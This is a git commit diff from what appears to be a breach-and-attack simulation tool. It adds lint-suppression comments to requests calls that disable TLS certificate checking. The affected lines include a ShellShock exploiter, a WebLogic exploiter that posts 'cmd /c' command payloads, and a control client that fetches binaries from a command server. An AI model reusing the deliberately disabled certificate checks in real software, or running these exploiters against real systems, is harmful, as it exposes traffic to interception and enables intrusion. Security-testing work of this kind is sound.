Try to avoid flake warnings on not checking SSL

This commit is contained in:
Daniel Goldberg 2019-11-28 12:41:37 +01:00
parent bf44f2355f
commit 58b775cfb5
6 changed files with 20 additions and 20 deletions

View File

@ -35,28 +35,28 @@ class MonkeyIslandRequests(object):
return request_function_wrapper return request_function_wrapper
def get_jwt_from_server(self): def get_jwt_from_server(self):
resp = requests.post(self.addr + "api/auth", resp = requests.post(self.addr + "api/auth", # noqa: DUO123
json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS}, json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS},
verify=False) verify=False)
return resp.json()["access_token"] return resp.json()["access_token"]
@_Decorators.refresh_jwt_token @_Decorators.refresh_jwt_token
def get(self, url, data=None): def get(self, url, data=None):
return requests.get(self.addr + url, return requests.get(self.addr + url, # noqa: DUO123
headers=self.get_jwt_header(), headers=self.get_jwt_header(),
params=data, params=data,
verify=False) verify=False)
@_Decorators.refresh_jwt_token @_Decorators.refresh_jwt_token
def post(self, url, data): def post(self, url, data):
return requests.post(self.addr + url, return requests.post(self.addr + url, # noqa: DUO123
data=data, data=data,
headers=self.get_jwt_header(), headers=self.get_jwt_header(),
verify=False) verify=False)
@_Decorators.refresh_jwt_token @_Decorators.refresh_jwt_token
def post_json(self, url, dict_data): def post_json(self, url, dict_data):
return requests.post(self.addr + url, return requests.post(self.addr + url, # noqa: DUO123
json=dict_data, json=dict_data,
headers=self.get_jwt_header(), headers=self.get_jwt_header(),
verify=False) verify=False)

View File

@ -53,7 +53,7 @@ class ControlClient(object):
if ControlClient.proxies: if ControlClient.proxies:
monkey['tunnel'] = ControlClient.proxies.get('https') monkey['tunnel'] = ControlClient.proxies.get('https')
requests.post("https://%s/api/monkey" % (WormConfiguration.current_server,), requests.post("https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(monkey), data=json.dumps(monkey),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
@ -76,7 +76,7 @@ class ControlClient(object):
if ControlClient.proxies: if ControlClient.proxies:
debug_message += " through proxies: %s" % ControlClient.proxies debug_message += " through proxies: %s" % ControlClient.proxies
LOG.debug(debug_message) LOG.debug(debug_message)
requests.get("https://%s/api?action=is-up" % (server,), requests.get("https://%s/api?action=is-up" % (server,), # noqa: DUO123
verify=False, verify=False,
proxies=ControlClient.proxies, proxies=ControlClient.proxies,
timeout=TIMEOUT_IN_SECONDS) timeout=TIMEOUT_IN_SECONDS)
@ -112,7 +112,7 @@ class ControlClient(object):
monkey = {} monkey = {}
if ControlClient.proxies: if ControlClient.proxies:
monkey['tunnel'] = ControlClient.proxies.get('https') monkey['tunnel'] = ControlClient.proxies.get('https')
requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps(monkey), data=json.dumps(monkey),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
@ -129,7 +129,7 @@ class ControlClient(object):
return return
try: try:
telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': data} telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': data}
requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,), requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(telemetry), data=json.dumps(telemetry),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
@ -144,7 +144,7 @@ class ControlClient(object):
return return
try: try:
telemetry = {'monkey_guid': GUID, 'log': json.dumps(log)} telemetry = {'monkey_guid': GUID, 'log': json.dumps(log)}
requests.post("https://%s/api/log" % (WormConfiguration.current_server,), requests.post("https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(telemetry), data=json.dumps(telemetry),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
@ -158,7 +158,7 @@ class ControlClient(object):
if not WormConfiguration.current_server: if not WormConfiguration.current_server:
return return
try: try:
reply = requests.get("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), reply = requests.get("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
@ -185,7 +185,7 @@ class ControlClient(object):
if not WormConfiguration.current_server: if not WormConfiguration.current_server:
return return
try: try:
requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123
data=json.dumps({'config_error': True}), data=json.dumps({'config_error': True}),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, verify=False,
@ -247,7 +247,7 @@ class ControlClient(object):
if (monkeyfs.isfile(dest_file)) and (size == monkeyfs.getsize(dest_file)): if (monkeyfs.isfile(dest_file)) and (size == monkeyfs.getsize(dest_file)):
return dest_file return dest_file
else: else:
download = requests.get("https://%s/api/monkey/download/%s" % download = requests.get("https://%s/api/monkey/download/%s" % # noqa: DUO123
(WormConfiguration.current_server, filename), (WormConfiguration.current_server, filename),
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)
@ -273,7 +273,7 @@ class ControlClient(object):
if not WormConfiguration.current_server: if not WormConfiguration.current_server:
return None, None return None, None
try: try:
reply = requests.post("https://%s/api/monkey/download" % (WormConfiguration.current_server,), reply = requests.post("https://%s/api/monkey/download" % (WormConfiguration.current_server,), # noqa: DUO123
data=json.dumps(host_dict), data=json.dumps(host_dict),
headers={'content-type': 'application/json'}, headers={'content-type': 'application/json'},
verify=False, proxies=ControlClient.proxies) verify=False, proxies=ControlClient.proxies)
@ -315,7 +315,7 @@ class ControlClient(object):
@staticmethod @staticmethod
def get_pba_file(filename): def get_pba_file(filename):
try: try:
return requests.get(PBA_FILE_DOWNLOAD % return requests.get(PBA_FILE_DOWNLOAD % # noqa: DUO123
(WormConfiguration.current_server, filename), (WormConfiguration.current_server, filename),
verify=False, verify=False,
proxies=ControlClient.proxies) proxies=ControlClient.proxies)

View File

@ -209,7 +209,7 @@ class ShellShockExploiter(HostExploiter):
try: try:
LOG.debug("Header is: %s" % header) LOG.debug("Header is: %s" % header)
LOG.debug("Attack is: %s" % attack) LOG.debug("Attack is: %s" % attack)
r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT) r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT) # noqa: DUO123
result = r.content.decode() result = r.content.decode()
return result return result
except requests.exceptions.RequestException as exc: except requests.exceptions.RequestException as exc:
@ -232,7 +232,7 @@ class ShellShockExploiter(HostExploiter):
attack_urls = [attack_path + url for url in url_list] attack_urls = [attack_path + url for url in url_list]
for u in attack_urls: for u in attack_urls:
try: try:
reqs.append(requests.head(u, verify=False, timeout=TIMEOUT)) reqs.append(requests.head(u, verify=False, timeout=TIMEOUT)) # noqa: DUO123
except requests.Timeout: except requests.Timeout:
timeout = True timeout = True
break break

View File

@ -80,7 +80,7 @@ class WebLogic201710271(WebRCE):
else: else:
payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL') payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
try: try:
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False) post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False) # noqa: DUO123
except Exception as e: except Exception as e:
LOG.error("Connection error: %s" % e) LOG.error("Connection error: %s" % e)
return False return False
@ -116,7 +116,7 @@ class WebLogic201710271(WebRCE):
def check_if_exploitable_weblogic(self, url, httpd): def check_if_exploitable_weblogic(self, url, httpd):
payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port) payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
try: try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False) post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False) # noqa: DUO123
except exceptions.ReadTimeout: except exceptions.ReadTimeout:
# Our request will not get response thus we get ReadTimeout error # Our request will not get response thus we get ReadTimeout error
pass pass

View File

@ -32,7 +32,7 @@ class HTTPFinger(HostFinger):
# try http, we don't optimise for 443 # try http, we don't optimise for 443
for url in (https, http): # start with https and downgrade for url in (https, http): # start with https and downgrade
try: try:
with closing(head(url, verify=False, timeout=1)) as req: with closing(head(url, verify=False, timeout=1)) as req: # noqa: DUO123
server = req.headers.get('Server') server = req.headers.get('Server')
ssl = True if 'https://' in url else False ssl = True if 'https://' in url else False
self.init_service(host.services, ('tcp-' + port[1]), port[0]) self.init_service(host.services, ('tcp-' + port[1]), port[0])

View File

@ -125,7 +125,7 @@ def check_internet_access(services):
""" """
for host in services: for host in services:
try: try:
requests.get("https://%s" % (host,), timeout=TIMEOUT, verify=False) requests.get("https://%s" % (host,), timeout=TIMEOUT, verify=False) # noqa: DUO123
return True return True
except ConnectionError: except ConnectionError:
# Failed connecting # Failed connecting